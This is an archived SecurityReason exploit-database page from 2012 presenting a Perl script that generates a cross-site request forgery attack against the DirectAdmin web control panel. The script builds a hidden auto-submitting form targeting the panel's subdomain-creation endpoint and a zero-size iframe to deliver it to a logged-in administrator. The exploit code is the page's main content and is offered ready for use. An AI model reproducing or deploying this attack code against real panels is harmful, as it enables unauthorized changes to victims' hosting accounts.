SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow ExploitAlert Database

Arrow  Topic :

DirectAdmin ADD Sub Domain CSRF Exploit


Arrow  ExploitAlert : 11194
Arrow  Credit : Turkeshan
Arrow  Date : 24.01.2012

Arrow   Download

Arrow   Plain text version


Arrow  Exploit Code :  

#!/usr/bin/perl
########################################################################
# Title : DirectAdmin Web Control Panel � 2005 JBMC
Software
# Author : Onur T�RKE�HAN
# Homepage : http://www.directadmin.com/
# tested on : Windows 7
# Seni Unutmayacagiz MIRIM-

system("cls");
print
"
+----------------------------------------+\n
| directadmin csrf vuln creator by turkeshan |\n
| cyber-warrior.org lojistik grup |\n
+----------------------------------------+\n
Loading ...\n
";
sleep(3);
print "Site aDi ";
$h = <STDIN>;
chomp $h;
print "Sub Domain Adi ";
$sub = <STDIN>;
chomp $usub;
$html = '<form name=info
action="http://'.$h.':2222/CMD_SUBDOMAIN?domain='.$h.'" method="POST">
<input type=hidden name=action value="create">
<input type=hidden name=domain value="'.$h.'">
<input type=text name=subdomain size=8 value="'.$sub.'">
<script>document.info.submit();</script>
</form>';
sleep(2);
print "olusturuluyor ...\n";
open(XSS , '>>csrf.htm');
print XSS $html;
close(XSS);
print "olusturuldu .. \n";
sleep(2);
print "dosyayi sitenize upload edin ve dosya ismini yazin";
$csrf = <STDIN>;
chomp $csrf;
$done = '<iframe id="iframe" src="'.$csrf.'" width="0"
height="0"></iframe>';
sleep(2);
print "exploit basariyla tamamlandi \n";
print $done."\n";
print "";
print "\n hayrini gorun .. ";






Arrow  Feedback :

If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.